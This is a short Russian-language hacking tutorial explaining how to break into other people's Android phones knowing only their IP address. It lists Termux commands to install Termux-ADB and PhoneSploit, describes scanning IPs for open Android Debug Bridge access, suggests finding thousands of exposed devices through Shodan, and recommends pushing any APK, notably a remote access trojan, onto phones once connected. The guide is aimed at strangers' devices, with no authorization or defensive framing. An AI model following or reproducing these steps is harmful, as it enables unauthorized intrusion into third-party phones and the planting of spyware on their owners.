Получаем доступ к чужим Android
Всем привет, с Вами Genesis. Cегодня мы разберем как подключиться к чужому Android, зная лишь его ip.
1) Установка базовых пакетов
apt update && apt upgrade
pkg install python python2 git
2) Установка Termux-ADB
git clone https://github.com/MasterDevX/Termux-ADB
cd Termux-ADB
chmod +x *
./InstallTools.sh
Возвращаемся в корневую директориюcd $HOME
Установка PhoneSploit
git clone https://github.com/metachar/PhoneSploit
cd PhoneSploit
pip install colorama
pip2 install colorama
python2 main_linux.py
Мы уже установили Termux-ADB, поэтому просто вводим Y
Работа с PhoneSploit После, открывается вот такое окно, где надо ввести IP устройства с включенным Adb для проверки на уязвимость.
Далее пишем цифру 3 и Ip нашего устройства. Если это устройство уязвимо, то появится сообщение:"connected to [ip адрес]:порт".
Для того, чтобы просканировать следующий IP-адрес нужно ввести цифру 3.
Как хакеры находят устройства с включенным Adb?
Хакеры ищут такие устройства с помощью Shodan (поисковой системы, которая позволяет пользователю находить телефоны определенного типа, подключенные к Интернету).
Например, по запросу "android debug bridge" Shodan выдает 12 тыс. открытых IP-адресов. Вдумайтесь, 12 тыс. потенциально уязвимых телефонов!
Понятное дело, что не все 12 тыс. устройств уязвимо. Но процентов 30% из них точно!
Что можно делать после этого?
Все! В самом буквальном смысле этого слова.
Более подробно написано вот тут.
Например, выбрав пункт номер 5, можно загрузить на устройство любой .apk файл. В частности, троян (RAT)